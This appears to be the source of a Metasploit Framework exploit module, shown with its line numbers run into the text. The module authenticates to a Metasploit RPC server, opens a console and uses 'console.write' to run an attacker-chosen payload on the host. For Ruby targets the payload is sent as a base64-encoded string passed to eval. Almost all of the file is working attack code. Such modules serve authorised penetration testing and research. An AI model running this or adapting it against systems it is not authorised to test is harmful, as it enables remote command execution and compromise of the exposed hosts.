Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Metasploit RPC Console Command Execution',15'Description' => %q{16This module connects to a specified Metasploit RPC server and17uses the 'console.write' procedure to execute operating18system commands. Valid credentials are required to access the19RPC interface.2021This module has been tested successfully on Metasploit 4.1522on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit234.14 on Windows 7 SP1.24},25'License' => MSF_LICENSE,26'Author' => 'bcoles',27'References' => [28[ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],29[ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]30],31'Platform' => %w{ruby unix win},32'Targets' => [33[34'Ruby', {35'Arch' => ARCH_RUBY,36'Platform' => 'ruby',37'Payload' => { 'BadChars' => "\x00" }38}39],40[41'Windows CMD', {42'Arch' => ARCH_CMD,43'Platform' => 'win',44'Payload' => { 'BadChars' => "\x00\x0A\x0D" }45}46],47[48'Unix CMD', {49'Arch' => ARCH_CMD,50'Platform' => 'unix',51'Payload' => { 'BadChars' => "\x00\x0A\x0D" }52}53]54],55'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },56'Privileged' => false,57'DisclosureDate' => '2011-05-22',58'DefaultTarget' => 0,59'Notes' => {60'Reliability' => UNKNOWN_RELIABILITY,61'Stability' => UNKNOWN_STABILITY,62'SideEffects' => UNKNOWN_SIDE_EFFECTS63}64)65)66register_options [67Opt::RPORT(55552),68OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),69OptString.new('PASSWORD', [true, 'Password for the specified username', '']),70OptBool.new('SSL', [ true, 'Use SSL', true])71]72end7374def execute_command(cmd, opts = {})75res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"7677if res.nil?78fail_with Failure::Unknown, 'Connection failed'79end8081unless res['wrote'].to_s =~ /\A\d+\z/82print_error "Could not write to console #{@console_id}:"83print_line res.to_s84return85end8687vprint_good "Wrote #{res['wrote']} bytes to console"88end8990def exploit91begin92@rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl93rescue Rex::ConnectionRefused => e94fail_with Failure::Unreachable, 'Connection refused'95rescue => e96fail_with Failure::Unknown, "Connection failed: #{e}"97end9899res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']100101if @rpc.token.nil?102fail_with Failure::NoAccess, 'Authentication failed'103end104105print_good 'Authenticated successfully'106vprint_status "Received temporary token: #{@rpc.token}"107108version = @rpc.call 'core.version'109110if res.nil?111fail_with Failure::Unknown, 'Connection failed'112end113114print_status "Metasploit #{version['version']}"115print_status "Ruby #{version['ruby']}"116print_status "API version #{version['api']}"117118vprint_status 'Creating new console...'119res = @rpc.call 'console.create'120121if res.nil?122fail_with Failure::Unknown, 'Connection failed'123end124125unless res['id'].to_s =~ /\A\d+\z/126print_error 'Could not create console:'127print_line res.to_s128return129end130131@console_id = res['id']132print_good "Created console ##{@console_id}"133134print_status 'Sending payload...'135136case target['Platform']137when 'ruby'138cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"139when 'win'140cmd = payload.encoded141when 'unix'142cmd = payload.encoded143else144fail_with Failure::NoTarget, 'Invalid target'145end146147execute_command cmd148end149150def cleanup151return if @console_id.nil?152153vprint_status 'Removing console...'154res = @rpc.call 'console.destroy', @console_id155156if res.nil?157print_error 'Connection failed'158return159end160161unless res['result'].eql? 'success'162print_warning "Could not destroy console ##{@console_id}:"163print_line res.to_s164return165end166167vprint_good "Destroyed console ##{@console_id}"168ensure169@rpc.close170end171end172173174